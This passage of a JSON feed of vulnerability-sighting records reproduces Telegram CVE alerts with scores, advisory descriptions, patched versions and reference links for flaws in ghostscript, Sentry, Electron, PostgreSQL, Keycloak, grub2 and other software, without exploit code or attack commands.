CVE-2020-16305 in ghostscript was not included in RHSA-2021:1852-06 advisory as it was claimed to be. This issue only affects the ghostscript package as shipped with Red Hat Enterprise Linux 8.\n\ud83d\udccf Published: 2023-08-23T12:19:29.156Z\n\ud83d\udccf Modified: 2025-07-01T13:58:15.854Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7053\n2. https://access.redhat.com/security/cve/CVE-2023-4042\n3. https://bugzilla.redhat.com/show_bug.cgi?id=1870257\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2228151", "creation_timestamp": "2025-07-01T14:11:12.000000Z"}, {"uuid": "62268122-9568-4bdd-a091-461c304fa9d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7053", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/20026", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4042\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in ghostscript. The fix for CVE-2020-16305 in ghostscript was not included in RHSA-2021:1852-06 advisory as it was claimed to be. This issue only affects the ghostscript package as shipped with Red Hat Enterprise Linux 8.\n\ud83d\udccf Published: 2023-08-23T12:19:29.156Z\n\ud83d\udccf Modified: 2025-07-01T13:58:15.854Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7053\n2. https://access.redhat.com/security/cve/CVE-2023-4042\n3. https://bugzilla.redhat.com/show_bug.cgi?id=1870257\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2228151", "creation_timestamp": "2025-07-01T14:11:12.000000Z"}, {"uuid": "c9bfcd0f-2be1-4142-998d-d8f1479ba31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PMWG-CVHR-8VH7", "type": "seen", "source": "Telegram/Vx6nINpqXkyN9lWmYzg7wzzb7SobZ66OCYhgiINimz-nM3E", "content": "", "creation_timestamp": "2026-04-24T22:53:42.000000Z"}, {"uuid": "736d630a-4d6f-4f48-86c6-0a37c2a27843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PRP-9GF7-4RXX", "type": "seen", "source": "Telegram/7J2TQ7boZzup2REzz7I0UjLQbEj9GYA2sSzdylgDH8Evqbs", "content": "", "creation_timestamp": "2026-04-23T21:27:11.000000Z"}, {"uuid": "b1d351c6-ba47-4364-bc22-7f9c3826ae44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W47F-J8RH-WX87", "type": "seen", "source": "Telegram/7J2TQ7boZzup2REzz7I0UjLQbEj9GYA2sSzdylgDH8Evqbs", "content": "", "creation_timestamp": "2026-04-23T21:27:11.000000Z"}, {"uuid": "4d99811b-15f5-4f2d-9932-0a7809bf8d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGH8-H4XC-PFMJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/20042", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53099\n\ud83d\udd25 CVSS Score: 5.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Sentry is a developer-first error tracking and performance monitoring tool. Prior to version 25.5.0, an attacker with a malicious OAuth application registered with Sentry can take advantage of a race condition and improper handling of authorization code within Sentry to maintain persistence to a user's account. With a specially timed requests and redirect flows, an attacker could generate multiple authorization codes that could be used to exchange for access and refresh tokens. This was possible even after de-authorizing the particular application. This issue has been patched in version 25.5.0. Self-hosted Sentry users should upgrade to version 25.5.0 or higher. Sentry SaaS users do not need to take any action.\n\ud83d\udccf Published: 2025-07-01T14:53:16.878Z\n\ud83d\udccf Modified: 2025-07-01T14:53:16.878Z\n\ud83d\udd17 References:\n1. https://github.com/getsentry/sentry/security/advisories/GHSA-mgh8-h4xc-pfmj\n2. https://github.com/getsentry/sentry/pull/85570\n3. https://github.com/getsentry/sentry/pull/85571\n4. https://github.com/getsentry/sentry/pull/86069\n5. https://github.com/getsentry/sentry/pull/86532\n6. https://github.com/getsentry/sentry/commit/57f0129e1e977b76fe8d16667a586578791a3dcd\n7. https://github.com/getsentry/sentry/commit/ab5fd932ca6bd46529ba3308b4669e3cee719b8f\n8. https://github.com/getsentry/sentry/commit/e6241254aead969e6c8490a81cde9a01335df19d", "creation_timestamp": "2025-07-01T15:07:56.000000Z"}, {"uuid": "a134a08c-565b-4d8f-9b22-0bee5e4621b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6HC-C5JR-878P", "type": "seen", "source": "Telegram/lUzHwqY45MH_oOS5UDHqr6saeA9vYjttsYdPIjT_NMATUwM", "content": "", "creation_timestamp": "2026-04-23T21:26:47.000000Z"}, {"uuid": "16c18254-aff1-4bee-b7f8-f526a4b3b4be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW5Q-G62X-2QJC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19995", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-46992\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Electron is an open source framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. From versions 30.0.0-alpha.1 to before 30.0.5 and 31.0.0-alpha.1 to before 31.0.0-beta.1, Electron is vulnerable to an ASAR Integrity bypass. This only impacts apps that have the embeddedAsarIntegrityValidation and onlyLoadAppFromAsar fuses enabled. Apps without these fuses enabled are not impacted. This issue is specific to Windows, apps using these fuses on macOS are not impacted. Specifically this issue can only be exploited if the app is launched from a filesystem the attacker has write access too. i.e. the ability to edit files inside the .app bundle on macOS which these fuses are supposed to protect against. This issue has been patched in versions 30.0.5 and 31.0.0-beta.1. There are no workarounds for this issue.\n\ud83d\udccf Published: 2025-07-01T01:43:13.767Z\n\ud83d\udccf Modified: 2025-07-01T01:43:13.767Z\n\ud83d\udd17 References:\n1. https://github.com/electron/electron/security/advisories/GHSA-xw5q-g62x-2qjc\n2. https://www.electronjs.org/docs/latest/tutorial/fuses", "creation_timestamp": "2025-07-01T02:07:40.000000Z"}, {"uuid": "45ff84b4-ccd2-4bc6-8ad2-a0a37ace878a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99C4-H4FQ-R23V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19993", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53005\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.11, there is a bypass vulnerability in Dataease's PostgreSQL Data Source JDBC Connection Parameters. The sslfactory and sslfactoryarg parameters could trigger a bypass vulnerability. This issue has been patched in version 2.10.11.\n\ud83d\udccf Published: 2025-07-01T00:33:53.963Z\n\ud83d\udccf Modified: 2025-07-01T00:33:53.963Z\n\ud83d\udd17 References:\n1. https://github.com/dataease/dataease/security/advisories/GHSA-99c4-h4fq-r23v", "creation_timestamp": "2025-07-01T01:07:26.000000Z"}, {"uuid": "84e2fd3b-cd6c-4dd8-b4e0-d94d4ee677e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5W6-38GP-MRQH", "type": "seen", "source": "Telegram/lUzHwqY45MH_oOS5UDHqr6saeA9vYjttsYdPIjT_NMATUwM", "content": "", "creation_timestamp": "2026-04-23T21:26:47.000000Z"}, {"uuid": "8fa08087-5281-45db-b2e3-5774f9bc2886", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5RV-W9PM-8QP8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3662", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0092\n\ud83d\udd25 CVSS Score: 4.8 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nAn authenticated user who has read access to the juju controller model, may construct a remote request to download an arbitrary file from the controller's filesystem.\n\n### Patches\nPatched in juju 2.9.38 and juju 3.0.3\n[juju/juju#ef803e2](https://github.com/juju/juju/commit/ef803e2a13692d355b784b7da8b4b1f01dab1556)\n\n### Workarounds\nLimit read access to the controller model to only trusted users.\n\n\ud83d\udccf Published: 2023-03-01T19:17:17Z\n\ud83d\udccf Modified: 2025-01-31T14:21:39Z\n\ud83d\udd17 References:\n1. https://github.com/juju/juju/security/advisories/GHSA-x5rv-w9pm-8qp8\n2. https://nvd.nist.gov/vuln/detail/CVE-2023-0092\n3. https://github.com/juju/juju/commit/ef803e2a13692d355b784b7da8b4b1f01dab1556\n4. https://bugs.launchpad.net/juju/+bug/1999622\n5. https://github.com/juju/juju", "creation_timestamp": "2025-01-31T15:14:56.000000Z"}, {"uuid": "5babcf08-2455-43ec-a7da-9cf6b028c4ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5Q2-7R4C-MV6G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4311", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-28180\n\ud83d\udd25 CVSS Score: 4.2 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\nAn attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). Thanks to Enze Wang@Alioth and Jianjun Chen@Zhongguancun Lab (@zer0yu and @chenjj) for reporting.\n\n### Patches\nThe problem is fixed in the following packages and versions:\n- github.com/go-jose/go-jose/v4 version 4.0.1\n- github.com/go-jose/go-jose/v3 version 3.0.3\n- gopkg.in/go-jose/go-jose.v2 version 2.6.3\n\nThe problem will not be fixed in the following package because the package is archived:\n- gopkg.in/square/go-jose.v2\n\ud83d\udccf Published: 2024-03-07T22:54:44Z\n\ud83d\udccf Modified: 2025-02-13T19:07:25Z\n\ud83d\udd17 References:\n1. https://github.com/go-jose/go-jose/security/advisories/GHSA-c5q2-7r4c-mv6g\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-28180\n3. https://github.com/go-jose/go-jose/commit/0dd4dd541c665fb292d664f77604ba694726f298\n4. https://github.com/go-jose/go-jose/commit/add6a284ea0f844fd6628cba637be5451fe4b28a\n5. https://github.com/go-jose/go-jose/commit/f4c051a0653d78199a053892f7619ebf96339502\n6. https://github.com/go-jose/go-jose\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GD2GSBQTBLYADASUBHHZV2CZPTSLIPQJ\n8. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6MMWFBOXJA6ZCXNVPDFJ4XMK5PVG5RG\n9. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IJ6LAJJ2FTA2JVVOACCV5RZTOIZLXUNJ\n10. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JNPMXL36YGS3GQEVI3Q5HKHJ7YAAQXL5\n11. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXKGNCRU7OTM5AHC7YIYBNOWI742PRMY\n12. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MSOMHDKRPU3A2JEMRODT2IREDFBLVPGS\n13. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UG5FSEYJ3GP27FZXC5YAAMMEC5XWKJHG\n14. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJO2U5ACZVACNQXJ5EBRFLFW6DP5BROY\n15. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJDO5VSIAOGT2WP63AXAAWNRSVJCNCRH", "creation_timestamp": "2025-02-13T19:15:35.000000Z"}, {"uuid": "a7d18cc8-af76-4310-a866-bb3f2b420109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHW9-X46C-V6Q4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4627", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mhw9-x46c-v6q4\n\ud83d\udd25 CVSS Score: 8.1 (CVSS_V3)\n\ud83d\udd39 Description: Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns.  Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal.  Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL.  Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected.\n\ud83d\udccf Published: 2025-02-13T15:31:25Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1094\n2. https://lists.debian.org/debian-lts-announce/2025/02/msg00015.html\n3. https://www.postgresql.org/support/security/CVE-2025-1094\n4. http://www.openwall.com/lists/oss-security/2025/02/16/3", "creation_timestamp": "2025-02-17T00:22:14.000000Z"}, {"uuid": "4ea21d98-6f89-46c3-96f2-a0646b0d849e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5M3-XH75-MP55", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5310", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26487\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs.`lassoAppend' function accepts 3 arguments and internally invokes `push` function on the 1st argument specifying array consisting of 2nd and 3rd arguments as `push` call argument. The type of the 1st argument is supposed to be an array, but it's not enforced. This makes it possible to specify any object with a `push` function as the 1st argument, `push` function can be set to any function that can be access via `event.view` (no all such functions can be exploited due to invalid context or signature, but some can, e.g. `console.log`). The issue is that`lassoAppend` doesn't enforce proper types of its arguments. This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS `setImmediate` polyfill basically allows `eval`-like functionality). This issue was patched in 5.23.0.\n\n\ud83d\udccf Published: 2023-03-03T23:47:28.486Z\n\ud83d\udccf Modified: 2025-02-25T15:01:54.570Z\n\ud83d\udd17 References:\n1. https://github.com/vega/vega/security/advisories/GHSA-w5m3-xh75-mp55\n2. https://github.com/vega/vega/commit/01adb034f24727d3bb321bbbb6696a7f4cd91689\n3. https://github.com/vega/vega/releases/tag/v5.23.0", "creation_timestamp": "2025-02-25T15:23:31.000000Z"}, {"uuid": "861dfd07-7a86-4771-be22-20cd7231fbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52JX-G6M5-H735", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6738", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27509\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: fleetdm/fleet is an open source device management, built on osquery. In vulnerable versions of Fleet, an attacker could craft a specially-formed SAML response to forge authentication assertions, provision a new administrative user account if Just-In-Time (JIT) provisioning is enabled, or create new accounts tied to forged assertions if f MDM enrollment is enabled. This vulnerability is fixed in 4.64.2, 4.63.2, 4.62.4, and 4.58.1.\n\ud83d\udccf Published: 2025-03-06T19:00:36.098Z\n\ud83d\udccf Modified: 2025-03-06T19:00:36.098Z\n\ud83d\udd17 References:\n1. https://github.com/fleetdm/fleet/security/advisories/GHSA-52jx-g6m5-h735\n2. https://github.com/fleetdm/fleet/commit/718c95e47ad010ad6b8ceb3f3460e921fbfc53bb", "creation_timestamp": "2025-03-06T19:38:27.000000Z"}, {"uuid": "c5d32794-3673-4eb9-9113-d66917ee0c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5145", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-02-26T04:13:19.878Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-02-26T04:24:30.000000Z"}, {"uuid": "4257c0b6-4cea-4027-839d-9763691668c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CG-7GW9-V8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7105", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2176\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability classified as critical has been found in libzvbi up to 0.2.43. This affects the function vbi_capture_sim_load_caption of the file src/io-sim.c. The manipulation leads to integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.2.44 is able to address this issue. The identifier of the patch is ca1672134b3e2962cd392212c73f44f8f4cb489f. It is recommended to upgrade the affected component. The code maintainer was informed beforehand about the issues. She reacted very fast and highly professional.\n\ud83d\udccf Published: 2025-03-11T07:31:05.090Z\n\ud83d\udccf Modified: 2025-03-11T07:31:05.090Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.299205\n2. https://vuldb.com/?ctiid.299205\n3. https://vuldb.com/?submit.512802\n4. https://github.com/zapping-vbi/zvbi/security/advisories/GHSA-g7cg-7gw9-v8cf\n5. https://github.com/zapping-vbi/zvbi/commit/ca1672134b3e2962cd392212c73f44f8f4cb489f\n6. https://github.com/zapping-vbi/zvbi/releases/tag/v0.2.44", "creation_timestamp": "2025-03-11T07:39:32.000000Z"}, {"uuid": "c814300a-46f0-47b4-9503-a0efcbd8c6c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QF9W-X9QX-2MQ7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7041", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27615\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: umatiGateway is software for connecting OPC Unified Architecture servers with an MQTT broker utilizing JSON messages. The user interface may possibly be publicly accessible with umatiGateway's provided docker-compose file. With this access, the configuration can be viewed and altered. Commit 5d81a3412bc0051754a3095d89a06d6d743f2b16 uses `127.0.0.1:8080:8080` to limit access to the local network. For those who are unable to use this proposed patch, a firewall on Port 8080 may block remote access, but the workaround may not be perfect because Docker may also bypass a firewall by its iptable based rules for port forwarding.\n\ud83d\udccf Published: 2025-03-10T18:47:59.819Z\n\ud83d\udccf Modified: 2025-03-10T19:05:29.676Z\n\ud83d\udd17 References:\n1. https://github.com/umati/umatiGateway/security/advisories/GHSA-qf9w-x9qx-2mq7\n2. https://github.com/umati/umatiGateway/pull/101\n3. https://github.com/umati/umatiGateway/commit/5d81a3412bc0051754a3095d89a06d6d743f2b16\n4. https://github.com/umati/umatiGateway/blob/abe73096a17307327f0d6dc0ed4db1fb93464521/README.md?plain=1#L34-L35", "creation_timestamp": "2025-03-10T19:38:33.000000Z"}, {"uuid": "d58a8f13-3164-43db-a814-0b1cd132eea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2544", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7075", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0604\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Keycloak. When an Active Directory user resets their password, the system updates it without performing an LDAP bind to validate the new credentials against AD. This vulnerability allows users whose AD accounts are expired or disabled to regain access in Keycloak, bypassing AD restrictions. The issue enables authentication bypass and could allow unauthorized access under certain conditions.\n\ud83d\udccf Published: 2025-01-22T14:34:45.923Z\n\ud83d\udccf Modified: 2025-03-11T00:16:04.768Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2544\n2. https://access.redhat.com/errata/RHSA-2025:2545\n3. https://access.redhat.com/security/cve/CVE-2025-0604\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2338993", "creation_timestamp": "2025-03-11T00:47:17.000000Z"}, {"uuid": "69a47ccd-f575-4728-9e97-3b6cc31c59c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2655", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7126", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-11T10:51:19.072Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2655\n3. https://access.redhat.com/security/cve/CVE-2025-0624\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-11T11:41:56.000000Z"}, {"uuid": "6d17ebf0-a109-407e-8db2-73352e1debb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8238", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "79e47560-104e-4959-a7cd-e7564784d4c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-74HP-MHFX-M45H", "type": "seen", "source": "Telegram/DG8qq-IN5LlVpvXT9zpOH1qOibs32wOleK_QLsJ4jBJzrJc", "content": "", "creation_timestamp": "2026-04-22T21:21:31.000000Z"}, {"uuid": "daa0cec9-a1d0-4ce7-9cc0-308cb1944bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7C4J-2M43-2MGH", "type": "seen", "source": "Telegram/DG8qq-IN5LlVpvXT9zpOH1qOibs32wOleK_QLsJ4jBJzrJc", "content": "", "creation_timestamp": "2026-04-22T21:21:31.000000Z"}, {"uuid": "2e63ae8c-0869-41df-8aff-caf6f3916419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CMP2-5F6G-MW34", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19299", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52568\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: NeKernal is a free and open-source operating system stack. Prior to version 0.0.3, there are several memory 